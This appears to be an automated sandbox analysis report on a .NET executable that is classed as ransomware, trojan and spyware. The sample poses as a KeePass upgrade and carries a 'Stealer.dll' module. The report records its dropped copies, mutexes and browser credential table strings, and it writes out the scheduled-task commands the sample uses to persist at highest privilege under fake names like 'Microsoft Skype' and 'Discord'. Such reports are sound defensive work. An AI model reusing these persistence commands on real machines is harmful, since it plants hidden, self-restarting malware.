Windows Analysis Report
CVmkXJ7e0a.exe

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F7D32F0	0_2_00007FFE6F7D32F0
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F7D1658	0_2_00007FFE6F7D1658
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F7D32C0	0_2_00007FFE6F7D32C0
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F7D0E60	0_2_00007FFE6F7D0E60
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F7D86E8	0_2_00007FFE6F7D86E8
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F7DEA60	0_2_00007FFE6F7DEA60
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F7DF54F	0_2_00007FFE6F7DF54F
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F987061	0_2_00007FFE6F987061
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F9852A0	0_2_00007FFE6F9852A0
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 15_2_00007FFE6F7E86E8	15_2_00007FFE6F7E86E8
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 15_2_00007FFE6F7E32F0	15_2_00007FFE6F7E32F0
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 15_2_00007FFE6F7E32C0	15_2_00007FFE6F7E32C0
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 25_2_00007FFE6F7C86E8	25_2_00007FFE6F7C86E8
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 25_2_00007FFE6F7C32F0	25_2_00007FFE6F7C32F0
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 25_2_00007FFE6F7C32E0	25_2_00007FFE6F7C32E0
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 32_2_00007FFE6F7B86E8	32_2_00007FFE6F7B86E8
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 32_2_00007FFE6F7B32F0	32_2_00007FFE6F7B32F0
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 32_2_00007FFE6F7B1658	32_2_00007FFE6F7B1658
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 32_2_00007FFE6F7B32E0	32_2_00007FFE6F7B32E0
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 42_2_00007FFE6F7E86E8	42_2_00007FFE6F7E86E8
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 42_2_00007FFE6F7E32F0	42_2_00007FFE6F7E32F0
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 42_2_00007FFE6F7E1658	42_2_00007FFE6F7E1658
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 42_2_00007FFE6F7E32E0	42_2_00007FFE6F7E32E0
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 42_2_00007FFE6F7E0E60	42_2_00007FFE6F7E0E60
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 52_2_00007FFE6F7C86E8	52_2_00007FFE6F7C86E8
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 52_2_00007FFE6F7C32F0	52_2_00007FFE6F7C32F0
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 52_2_00007FFE6F7C1729	52_2_00007FFE6F7C1729
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 52_2_00007FFE6F7C32C0	52_2_00007FFE6F7C32C0
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 52_2_00007FFE6F7C0E5A	52_2_00007FFE6F7C0E5A
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 62_2_00007FFE6F7D86E8	62_2_00007FFE6F7D86E8
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 62_2_00007FFE6F7D32F0	62_2_00007FFE6F7D32F0
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 62_2_00007FFE6F7D1658	62_2_00007FFE6F7D1658
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 62_2_00007FFE6F7D32C0	62_2_00007FFE6F7D32C0

Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012CD3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKeePass Upgrade.exe@ vs CVmkXJ7e0a.exe
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683803709.000000001C3C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDnlibOld.dll. vs CVmkXJ7e0a.exe
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012D2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKeePass Upgrade.exe@ vs CVmkXJ7e0a.exe
Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameStealer.dll0 vs CVmkXJ7e0a.exe
Source: CVmkXJ7e0a.exe, 00000000.00000000.2410516815.0000000000848000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameKeePass Upgrade.exe@ vs CVmkXJ7e0a.exe
Source: CVmkXJ7e0a.exe, 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameStealer.dll0 vs CVmkXJ7e0a.exe
Source: CVmkXJ7e0a.exe	Binary or memory string: OriginalFilenameKeePass Upgrade.exe@ vs CVmkXJ7e0a.exe

Source: 0.2.CVmkXJ7e0a.exe.1cf10000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.CVmkXJ7e0a.exe.1cf10000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers

Source: CVmkXJ7e0a.exe, EwPduhLHZPgxos.cs	Security API names: Directory.GetAccessControl
Source: CVmkXJ7e0a.exe, EwPduhLHZPgxos.cs	Security API names: Directory.SetAccessControl
Source: CVmkXJ7e0a.exe, uDqwEoCawAvVDLr.cs	Security API names: File.GetAccessControl
Source: CVmkXJ7e0a.exe, uDqwEoCawAvVDLr.cs	Security API names: File.SetAccessControl
Source: 0.2.CVmkXJ7e0a.exe.1c3c0000.2.raw.unpack, -Module-.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: CVmkXJ7e0a.exe, hJDfaTkAZZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: CVmkXJ7e0a.exe, XPUiTLDMwepV.cs	Security API names: File.GetAccessControl
Source: CVmkXJ7e0a.exe, XPUiTLDMwepV.cs	Security API names: File.SetAccessControl
Source: CVmkXJ7e0a.exe, XPUiTLDMwepV.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: CVmkXJ7e0a.exe, ncogkvKUZZJb.cs	Security API names: Directory.GetAccessControl
Source: CVmkXJ7e0a.exe, ncogkvKUZZJb.cs	Security API names: Directory.SetAccessControl
Source: CVmkXJ7e0a.exe, ncogkvKUZZJb.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@156/126@5/3

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

File created: C:\Users\Public\Pictures\xdwdUpdate.exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:304:WilStaging_02
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Mutant created: \Sessions\1\BaseNamedObjects\Sheet_gtvkxvqcvz
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1592:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4380:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4644:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1828:120:WilError_03
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2484:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4644:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1828:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Mutant created: \Sessions\1\BaseNamedObjects\sVD9h6DSh412O
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:548:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:304:WilStaging_02

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

File created: C:\Users\user\AppData\Local\Temp\lchlzmhj.erl

Source: CVmkXJ7e0a.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CVmkXJ7e0a.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012CCD000.00000004.00000800.00020000.00000000.sdmp, tmp7E9C.tmp.dat.0.dr, tmp7714.tmp.dat.0.dr	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: tmp782E.tmp.dat.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: tmp818B.tmp.dat.0.dr, tmp81EA.tmp.dat.0.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: CVmkXJ7e0a.exe

ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

File read: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Source: unknown	Process created: C:\Users\user\Desktop\CVmkXJ7e0a.exe "C:\Users\user\Desktop\CVmkXJ7e0a.exe"
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe"
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Access Update" /tr "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Access Update" /tr "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe" /RL HIGHEST
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe C:\Users\user\AppData\Roaming\xdwdpnsvr.exe
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Users\Public\Pictures\xdwdUpdate.exe "C:\Users\Public\Pictures\xdwdUpdate.exe"
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe"
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Microsoft Skype"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Microsoft Skype"
Source: unknown	Process created: C:\Users\Public\Pictures\xdwdUpdate.exe C:\Users\Public\Pictures\xdwdUpdate.exe
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe"
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
